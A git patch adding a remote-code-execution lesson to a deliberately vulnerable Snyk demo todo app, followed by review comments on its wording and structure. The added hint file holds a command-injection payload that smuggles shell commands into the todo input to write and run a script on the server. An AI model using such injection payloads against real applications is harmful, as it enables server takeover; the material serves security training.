From a4891ff9c1b6f2951d6107b4feb4a1a44e24e33a Mon Sep 17 00:00:00 2001 From: Dennis Ochocki Date: Mon, 24 Jun 2019 17:30:58 +0200 Subject: [PATCH] Added a remote code excecution vulnerability for snyk-demo-todo_goof --- README.md | 7 +++++++ rce/1.md | 13 +++++++++++++ 2 files changed, 20 insertions(+) create mode 100644 rce/1.md diff --git a/README.md b/README.md index 15a31d0..602e423 100644 --- a/README.md +++ b/README.md @@ -272,6 +272,13 @@ Back on the snyk project page, find the XSS vulnerability in the ```marked``` pa After updating your application, try your hacks again. Congratulations, you’ve remediated the XSS vulnerability and shouldn’t be able to embed JavaScript on the web page any longer. +## Remote Code Excecution + +If a developer is using exec-commands to execute system tools he has to be sure, that there is no way escaping the command string. +Best practice is not using commands like exec. + +Click to see [Hint 1](rce/hint1.md). + # Java Goof Installation To start with, you’ll need to clone the java-goof repository, and build your application. The application can be found on GitHub here: [https://github.com/snyk/java-goof](https://github.com/snyk/java-goof). diff --git a/rce/1.md b/rce/1.md new file mode 100644 index 0000000..faf50ef --- /dev/null +++ b/rce/1.md @@ -0,0 +1,13 @@ +Take a look at app.js and find out what is happening, if you create a todo. + +Check out the route mapping under routes/index.js. + +Find vulnerable exec command. + +Just put... + +``` +![alt text](https://its-me-dennis.ovh/wp-content/uploads/2019/05/photo504663614128498900.jpg || echo '#!/bin/bash\n#bad stuff happening' > /tmp/extracted_files/exploit.sh && chmod +x /tmp/extracted_files/exploit.sh && /tmp/extracted_files/exploit.sh" hax0r +``` + +in the input box an have fun (simply via webbrowser, in my case Chromium 75.0.3770.90). \ No newline at end of file
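Review bot: In the README.md hunk the new section links to `rce/hint1.md`, but the file this patch creates is `rce/1.md`, so the link is dead as committed; rename one of the two so they match. "Excecution" in the heading (and in the commit subject) should be "Execution". The two explanatory sentences need tightening: "If a developer is using exec-commands to execute system tools he has to be sure, that there is no way escaping the command string." reads better as "If a developer uses exec to run system tools, they must make sure user input can never break out of the command string.", and "Best practice is not using commands like exec." is too vague to act on; say what to do instead, for example pass arguments as an array to `execFile`/`spawn` instead of building a shell string, and validate the input before it reaches the command. The preceding XSS section first has the learner find the issue on the Snyk project page and then remediate it ("After updating your application, try your hacks again"); this section only links a hint and has no find-it or fix-it step, so the learner never actually closes the vulnerability. Consider mirroring that structure.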
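Review bot: In the rce/1.md hunk the file is presented from the README as "Hint 1" but hands the learner the full payload with no explanation, so it is a solution rather than a hint; it would teach more if it said which part of the todo input reaches the `exec` call, why the stray `"` before `hax0r` is there, and how the fix (an argument array with no shell string) stops the payload from working. The payload also loads an image from a personal domain (its-me-dennis.ovh) that the repository does not control; use a placeholder URL or an image checked into the repo so the exercise does not break when that host changes. Smaller points: the fenced block has no language tag, "Find vulnerable exec command." should be "Find the vulnerable exec command.", the last line should read "in the input box and have fun (simply via a web browser, ...)" rather than "an have fun" and "webbrowser", and the file is committed without a trailing newline ("\ No newline at end of file").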